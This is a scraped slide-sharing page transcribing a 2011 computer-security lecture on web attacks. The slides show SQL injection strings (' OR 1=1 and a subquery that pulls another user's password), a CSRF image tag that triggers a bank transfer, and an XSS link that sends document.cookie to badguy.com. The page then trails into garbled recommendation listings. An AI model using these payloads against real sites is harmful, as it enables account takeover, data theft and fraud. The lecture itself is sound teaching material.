Video Converter
Audio Converter
Image Converter
PDF Converter
File Compressor
web attacks con t

Web Attacks, cont CS 161: Computer Security Prof. Vern Paxson TAs: - PowerPoint PPT Presentation

Jul 04, 2023 •256 likes •777 views

Web Attacks, cont CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture a week from Thursday (March

  1. Web Attacks, con’t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011

  2. Announcements • Guest lecture a week from Thursday (March 3rd), Prof. David Wagner – Correction: material will not be in scope for the Midterm • My office hours the week of March 7th will be by appointment • Homework #2 should be out by tonight, due in 1 week

  3. Goals For Today • Make previously discussed web attacks concrete – SQL injection – Cross-site request forgery (CSRF) – Reflected cross-site scripting (XSS) • Illustrate additional web attacks – Stored XSS – Clickjacking • … and discuss defenses

  4. SQL Injection Scenario • Suppose web server front end stores URL parameter “ recipient ” in variable $recipient and then builds up a string with the following SQL query: $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' "; • How can recipient cause trouble here? – How can we see anyone’s account?

  5. SQL Injection Scenario, con’t WHERE Balance < 100 AND Username='$recipient'; " • $recipient = foo ' OR 1=1; -- WHERE Balance < 100 AND Username='foo' OR 1=1; --' " • Precedence & “--” (comment) makes this: WHERE (Balance < 100 AND Username='foo') OR 1=1; • Always true!

  6. Demo Tools • Bro : freeware network monitoring tool – Scriptable – Primarily designed for real-time intrusion detection – www.bro-­‑ids.org • Squigler – Cool “ localhost ” web site(s) (Python/SQLite) – Developed by Arel Cordero – Let me know if you’d like a copy to play with

  7. def ¡post_squig(user, ¡squig): ¡ ¡ ¡ ¡if ¡not ¡user ¡or ¡not ¡squig: ¡return ¡ ¡ ¡ ¡conn ¡= ¡sqlite3.connect(DBFN) ¡ ¡ ¡ ¡c ¡ ¡ ¡ ¡= ¡conn.cursor() ¡ ¡ ¡ ¡c.executescript("INSERT ¡INTO ¡squigs ¡VALUES ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡('%s', ¡'%s', ¡datetime('now'));" ¡% ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡(user, ¡squig)) ¡ ¡ ¡ ¡conn.commit() Server code for posting a “squig” ¡ ¡ ¡ ¡c.close() INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡'don't ¡contractions ¡work?', ¡ ¡ ¡ ¡ ¡ ¡date); Syntax error

  8. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date);

  9. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , Empty string literals ¡ ¡ ¡ ¡ ¡ ¡date);

  10. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , Concatenation operator. ¡ ¡ ¡ ¡ ¡ ¡date); Concatenation of string S with empty string is just S INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ (select password from accounts where username='bob') , ¡ ¡ ¡ ¡ ¡ ¡date); Value of the squig will be Bob’s password!

  11. Web Accesses w/ Side Effects • Recall our earlier banking URL: http://mybank.com/moneyxfer.cgi?account=alice&amt=50&to=bob • So what happens if we visit evilsite.com , which includes: <img ¡src="http://mybank.com/moneyxfer.cgi? ¡ ¡ ¡Account=alice&amt=500000&to=DrEvil"> • Cross-Site Request Forgery ( CSRF ) attack

  12. URL fetch for posting a squig Request ¡(to ¡127.0.0.1/8080): ¡GET ¡ ¡ ¡ ¡/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert ¡ ¡ ¡ ¡&squig=squigs+speak+a+deep+truth HOST: ¡"localhost:8080" REFERER:"http://localhost:8080/userpage?user=dilbert" COOKIE: ¡"session_id=5321506" Web action with side effect

  13. URL fetch for posting a squig Request ¡(to ¡127.0.0.1/8080): ¡GET ¡ ¡ ¡ ¡/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert ¡ ¡ ¡ ¡&squig=squigs+speak+a+deep+truth HOST: ¡"localhost:8080" REFERER:"http://localhost:8080/userpage?user=dilbert" COOKIE: ¡"session_id=5321506" Authenticated with cookie that browser automatically sends along

  14. Subversive Script Execution

  15. Cross-Site Scripting ( XSS ) • Attacker’s goal: cause victim’s browser to execute Javascript written by the attacker … • … but with the browser believing that the script instead was sent by a trust server mybank.com – In order to circumvent the Same Origin Policy (SOP), which will prevent the browser from letting Javascript received directly from evil.com to have full access to content from mybank.com • (Do not confuse with CSRF! CSRF is about web requests with side effects; XSS is about getting Javascript treated as though a trusted server sent it)

  16. The Setup • User input is echoed into HTML response. • Example : search field – http://victim.com/search.php?term= apple – search.php responds with: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . . . </BODY> </HTML> • How can an attacker exploit this? 16

  17. Injection Via Bad Input • Consider link: (properly URL encoded) http://victim.com/search.php?term= <script> window.open( "http://badguy.com?cookie = " + document.cookie ) </script> What if user clicks on this link? 1) Browser goes to victim.com/search.php 2) victim.com returns <HTML> Results for <script> … </script> … 3) Browser executes script in same origin as victim.com Sends badguy.com cookie for victim.com Or any other arbitrary execution / rewrite victim.com page 17

  18. Demo on (1) Finding and (2) Exploiting Reflected XSS vulnerabilities

  19. Cross-Site Scripting (XSS) Victim client

  20. Cross-Site Scripting (XSS) Attack Server visit web site 1 Victim client

  21. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 Victim client

  22. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 Exact URL under attacker’s control 3 click on link Victim client Server Patsy/Victim

  23. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input Server Patsy/Victim

  24. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it

  25. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it

  26. Cross-Site Scripting (XSS) Attack Server visit web site And/Or: 1 receive malicious page send valuable data 2 7 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it

  27. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page send valuable data 2 7 (“Reflected” XSS attacks) 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it

  29. Stored Cross-Site Scripting Attack Server

  30. Stored Cross-Site Scripting Attack Server 1 Inject malicious script Server Patsy/Victim

  31. Stored Cross-Site Scripting Attack Server 1 Inject malicious User Victim script Server Patsy/Victim

  32. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script Server Patsy/Victim

  33. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim

  34. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it

  35. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it

  36. Stored Cross-Site Scripting Attack Server And/Or: steal valuable data 6 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it

  37. Stored Cross-Site Scripting Attack Server steal valuable data 6 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script (A “stored” embedded in input XSS attack) as though server meant us to run it

Recommend

CON MI NE CON MI NE CON MI NE CON MI NE CLOSURE &amp; RECLAMATI ON CLOSURE &amp; RECLAMATI ON

CON MI NE CON MI NE CON MI NE CON MI NE CLOSURE &amp; RECLAMATI ON CLOSURE &amp; RECLAMATI ON

CON MI NE CON MI NE CON MI NE CON MI NE CLOSURE &amp; RECLAMATI ON CLOSURE &amp; RECLAMATI ON CLOSURE &amp; RECLAMATI ON CLOSURE &amp; RECLAMATI ON PLAN OVERVI EW PLAN OVERVI EW February 2 2 nd nd , 2 0 0 7 February 2 2 , 2 0 0 7 C C

700 views • 57 slides
Consistency Maintenance: Propagation Consistency Maintenance: Propagation Con fl ict Resolution

Consistency Maintenance: Propagation Consistency Maintenance: Propagation Con fl ict Resolution

Consistency Maintenance: Propagation Consistency Maintenance: Propagation Con fl ict Resolution Challenges Activating inactive features Fix incompleteness 9 97 Con fi gurator Con fi guration GUI Con fi guration Language Code Con fi gurator Con

487 views • 31 slides
Web Services Web Services Towards Web Services Towards Web Services Towards Web Services A

Web Services Web Services Towards Web Services Towards Web Services Towards Web Services A

Web Services Web Services Towards Web Services Towards Web Services Towards Web Services A long way to get here What is a Web Service? What is a Web Service? What is a Web Service? Web Services Web Services Software service :

552 views • 33 slides
Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

IN3210 Network Security Web Application Security Attacks on the Web Attacker Web User Application Web Database Web Server Application 2 The OWASP Foundation The Open Web Application Security Project (OWASP) is a 501(c)(3)

1.22k views • 60 slides
Company Presentation Con Condo dor r Pr Pressu essure Con e Contr trol ol Parent Company

Company Presentation Con Condo dor r Pr Pressu essure Con e Contr trol ol Parent Company

Con Condo dor r Pr Pressu essure Con e Contr trol ol Controls &amp; Solutions the inventor of the pressure switch! Since 1893 Company Presentation Con Condo dor r Pr Pressu essure Con e Contr trol ol Parent Company Controls

503 views • 12 slides
Representing Constraints datatype con = of ty * ty | /\ of con * con | TRIVIAL infix 4

Representing Constraints datatype con = of ty * ty | /\ of con * con | TRIVIAL infix 4

Representing Constraints datatype con = of ty * ty | /\ of con * con | TRIVIAL infix 4 infix 3 /\ Solving Constraints We solve a constraint C by finding a substitution such that the constraint C is satisfied . Substitutions

348 views • 23 slides
Web Mining Web Mining Web Mining Web Mining Web mining is the use of data mining techniques

Web Mining Web Mining Web Mining Web Mining Web mining is the use of data mining techniques

What is Web Mining? Wh t i W b Mi i What is Web Mining? Wh t i W b Mi i ? ? Web Mining Web Mining Web Mining Web Mining Web mining is the use of data mining techniques to automat cally d scover and extract nformat on automatically

777 views • 20 slides
Lecture 1: Semantic Web and RDF Aidan Hogan aidhog@gmail.com THE WEB The Web is now 26 years

Lecture 1: Semantic Web and RDF Aidan Hogan aidhog@gmail.com THE WEB The Web is now 26 years

Lecture 1: Semantic Web and RDF Aidan Hogan aidhog@gmail.com THE WEB The Web is now 26 years old Evolution of the Web The Future of the Web? THE SEMANTIC WEB The Semantic Web what is the Semantic Web? Semantic Web?

1.36k views • 99 slides
Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls. Type of Attack

185 views • 7 slides
Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22 Overview What is a stream cipher? Classification of attacks Different Attacks Exhaustive Key Search Time Memory Tradeoffs

659 views • 22 slides
Web Mining Web Mining to automatically discover and extract information from Web

Web Mining Web Mining to automatically discover and extract information from Web

What is Web Mining? What is Web Mining? Web mining is the use of data mining techniques Web Mining Web Mining to automatically discover and extract information from Web documents/services (Etzioni, 1996, CACM 39(11)) 1 2 The Web The Web

469 views • 23 slides
Web Scraping 1 / 9 Web Scraping Two ways to mine data from the web The hard way, by web

Web Scraping 1 / 9 Web Scraping Two ways to mine data from the web The hard way, by web

Web Scraping 1 / 9 Web Scraping Two ways to mine data from the web The hard way, by web scraping The easy way, using web service APIs Well see examples of both. 2 / 9 Web Scraping Web scraping, a.k.a. screen scraping, means getting

486 views • 9 slides
Agenda Web MVC-2: Apache Struts Drawbacks with Web Model 1 Web Model 2 (Web MVC) Rimon

Agenda Web MVC-2: Apache Struts Drawbacks with Web Model 1 Web Model 2 (Web MVC) Rimon

Agenda Web MVC-2: Apache Struts Drawbacks with Web Model 1 Web Model 2 (Web MVC) Rimon Mikhaiel Struts framework rimon@cs.ualberta.ca Example of workflow management. A Hello World Example Web Model 2 Web Model 1 Web MVC

611 views • 4 slides
Using Web- -Based Technology Based Technology Using Web of Connecticut ( of Connecticut (con

Using Web- -Based Technology Based Technology Using Web of Connecticut ( of Connecticut (con

Our Challenges at the University Our Challenges at the University Using Web- -Based Technology Based Technology Using Web of Connecticut ( of Connecticut (con con t t.) .) to Enhance First Year to Enhance First Year

258 views • 6 slides
Attacks on Clients Attacks on Clients (Section 7.1.3 on JavaScript; (Section 7.1.3 on

Attacks on Clients Attacks on Clients (Section 7.1.3 on JavaScript; (Section 7.1.3 on

Software and Web Security 2 Software and Web Security 2 Attacks on Clients Attacks on Clients (Section 7.1.3 on JavaScript; (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Last week: web server can be attacked

835 views • 43 slides
Web Services Serge Abiteboul INRIA-Futurs Web services 2002 1 Abstract Web services

Web Services Serge Abiteboul INRIA-Futurs Web services 2002 1 Abstract Web services

Web Services Serge Abiteboul INRIA-Futurs Web services 2002 1 Abstract Web services 2002 2 Abstract: web services Web Services are the next step in the evolution of the World Wide Web and allow active objects to be placed on Web

753 views • 61 slides
The rd NS v Sim ulator W orkshop br ought to you by Kevin F all La

The rd NS v Sim ulator W orkshop br ought to you by Kevin F all La

The rd NS v Sim ulator W orkshop br ought to you by Kevin F all La wrence Berk eley National Lab oratory kfal le elblgov httpwwwnr ge elblgovkfal l AND Kannan V aradhan

938 views • 72 slides
Rule Set Based Access Control (RSBAC) Amon Ott &lt;ao@rsbac.org&gt; Contents: 1 Introduction

Rule Set Based Access Control (RSBAC) Amon Ott &lt;ao@rsbac.org&gt; Contents: 1 Introduction

Rule Set Based Access Control (RSBAC) Amon Ott &lt;ao@rsbac.org&gt; Contents: 1 Introduction 1.1 History 1.2 Motivation 1.3 Design Goals 1.4 Overview of RSBAC 2 Architecture and Implementation of the Framework 2.1 Subjects, Objects and

559 views • 39 slides
MMUSIC WG 47th IETF 30 March 2000 - Adelaide 30 March 2000 MMUSIC WG 1 MMUSIC Agenda 1530

MMUSIC WG 47th IETF 30 March 2000 - Adelaide 30 March 2000 MMUSIC WG 1 MMUSIC Agenda 1530

MMUSIC WG 47th IETF 30 March 2000 - Adelaide 30 March 2000 MMUSIC WG 1 MMUSIC Agenda 1530 Agenda Bashing &amp; Status Update (chair, 5) 1535 SAPv2 Review -06 (Perkins, 15) draft-ietf-mmusic-sap-v2-06.txt 1550 Issue: SAP Server Access

107 views • 8 slides
ns-2 101 Polly Huang USC/ISI huang@isi.edu 1 The Internet Got to make the Infocom submission

ns-2 101 Polly Huang USC/ISI huang@isi.edu 1 The Internet Got to make the Infocom submission

ns-2 101 Polly Huang USC/ISI huang@isi.edu 1 The Internet Got to make the Infocom submission deadline!! Web Web TCP TCP www.cs.columbia.edu Internet Network Network Link/Physical Link/Physical 2 ns-2 Network Simulator Version

592 views • 30 slides
Web Security! Big Picture: Browser and Network request website Browser reply OS Network

Web Security! Big Picture: Browser and Network request website Browser reply OS Network

CSE 484 / CSE M 584: Computer Security and Privacy CSRF and XSS attacks Fall 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell,

1.29k views • 59 slides
CSE543 - Computer and Network Security Module: Web Security Professor Trent Jaeger Fall 2010 1

CSE543 - Computer and Network Security Module: Web Security Professor Trent Jaeger Fall 2010 1

978 views • 41 slides
HoneySpider Network Fighting client side threats Piotr Kijewski (NASK/CERT Polska) Carol Overes

HoneySpider Network Fighting client side threats Piotr Kijewski (NASK/CERT Polska) Carol Overes

HoneySpider Network Fighting client side threats Piotr Kijewski (NASK/CERT Polska) Carol Overes (GOVCERT.NL) Rogier Spoor (SURFnet) 20th Annual FIRST Conference on Computer Security Incident Handling, June 22-27, Vancouver Goals

501 views • 36 slides
Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov

Can You Trust Your Encrypted Cloud? An Assessment of SpiderOakONEs Security Anders Dalskov Claudio Orlandi Aarhus University RWC 2018 Agenda I A Threat Model for Encrypted Cloud Storage (ECS). I A high-level look into a modern ECS service

775 views • 47 slides

More recommend

Explore More Topics

Stay informed with curated content and fresh updates.

animals pets art culture automotive transportation business finance computer internet construction architecture education-career electronics communication

Logo Sambuz

Unleash a World of Digital Possibilities—Browse, Share, and Explore Content Without Boundaries

Useful Links

About Us Privacy Services FAQ's Contact

Newsletter

Stay Informed & Inspired—Subscribe for the Latest Updates, Tips, and Exclusive Content Directly to Your Inbox.

Mail Us

mail@sambuz.com

2026 SAMBUZ, All right reserved.